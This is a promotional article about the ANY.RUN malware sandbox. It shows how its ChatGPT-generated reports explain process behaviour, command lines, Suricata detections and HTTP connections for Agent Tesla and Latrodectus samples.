Artificial Intelligence (AI) proves invaluable in a myriad of contexts, including cybersecurity. Its ability to process large amounts of data, learn from patterns, and adapt to new situations makes it ideal for analyzing viruses and other malware. Here are key areas where AI plays a significant role in malware analysis.
Process Tree Analysis
Inspecting processes as part of malware analysis involves an examination of system or individual process behavior. It helps:
- Identify process injection techniques employed by malware to execute malicious code within legitimate processes
- Analyze process interactions to reveal suspicious relationships
- Monitor resource usage to detect resource-intensive malware activities
- Examine process loading and unloading events to uncover advanced malware tactics
- Investigate process origins to assess potential risks associated with individual processes.
How Artificial Intelligence Can Assist in Examining Malware Processes
One of the possible ways to use AI to study malicious processes is via the ANY.RUN sandbox.
This cloud service not only provides advanced tools for investigating suspicious files and URLs, but also integrates several Artificial intelligence modules that make it easier for security analysts to understand the behavior of different threats.
Check out this sandbox analysis of an .xz archive containing Agent Tesla, one of the most widespread malware families
Analysis of Agent Tesla in ANY.RUN
Apart from providing a complete overview of the threat’s network, registry, file system activities, the service also offers ChatGPT-generated reports for each process recorded during the malware’s execution.
AI report on the malicious process in ANY.RUN
Above, you can see an AI report for the process related to the main file. The report summarizes the sandbox analysis, providing the following insights into the malicious activities associated with the process:
- Reading sensitive information from the registry
- Stealing personal data and credentials
- Checking for external IP
- Connecting to SMTP port
- Attempting to transmit email messages via SMTP
The AI also explains these activities, helping the user understand how the malware operates on the system.
Try AI malware reports with a free ANY.RUN account! |
Command Line
Malware might use command line arguments to execute embedded scripts, launch additional malicious processes, or modify system configurations. By reviewing command history, analysts can identify patterns of malicious activity, such as repeated attempts to access restricted resources or execute unauthorized commands, which could signify a compromised account or an ongoing attack.
How AI Helps Investigate Command Lines
In this sandbox session, we observe the execution of Latrodectus, a relatively new malware family with extensive data stealing capabilities.
The process tree lets us see that during the analysis, “wscript.exe” was launched via the command line.
AI reveals malicious script execution by Latrodectus
By clicking on the corresponding AI report, we discover that this process was likely initiated by the malware to deploy a malicious JavaScript script.
Suricata Rule Detection
Suricata is an open-source tool used for network security monitoring, intrusion detection, and prevention. When a Suricata rule is triggered, it signifies a potential security threat based on predefined rules and signatures. Understanding these triggers involves investigating the rule that was triggered, the corresponding event data, and the context in which it occurred. This detailed analysis provides insight into the threat, its potential impact, and the appropriate response strategy.
How AI Helps Understand Suricata Detection
Thanks to the Chat-GPT integration, ANY.RUN offers detailed AI-generated explanations of each Suricata detection instance.
Let’s continue with our analysis of Latrodectus.
Suricata rule used for detecting MSI file downloads
By navigating to the triggered Suricata rule and clicking on the ChatGPT icon, we can access the AI report.
AI overview of the triggered Suricata rule
The AI message informs us about a “Potential Corporate Privacy Violation” caused by traffic from the source IP to the destination IP over port 80. The report also indicates that it is a request for downloading and installing MSI files.
HTTP Connections
Analyzing HTTP connection data is crucial in detecting network-based threats. Malware often communicates with its Command and Control (C&C) servers via HTTP connections to receive instructions or exfiltrate data. By reviewing HTTP connection data, cybersecurity professionals can identify suspicious network activity, such as unusual data transfer patterns, unauthorized connections, or connections to known malicious IP addresses.
AI Analysis of HTTP Connections
Let’s take a look at this sandbox session, which once again involves Agent Tesla.
When reviewing the detected HTTP requests, we come across a suspicious ip-api[.]com[/]line/?fields[=]hosting connection.
AI report on the suspicious HTTP connection
When we click on the ChatGPT icon, we receive an explanation that it is the malware’s potential attempt to determine if it is operating within a virtual environment.
It does this by requesting information about the device’s IP address to establish whether it is residential or hosting-based.
Conclusion
AI’s role in malware analysis is multifaceted and critical. It automates complex tasks, providing insightful analysis and enabling real-time threat detection.
Use the free ANY.RUN sandbox to conduct advanced malware and phishing analysis with AI assistance!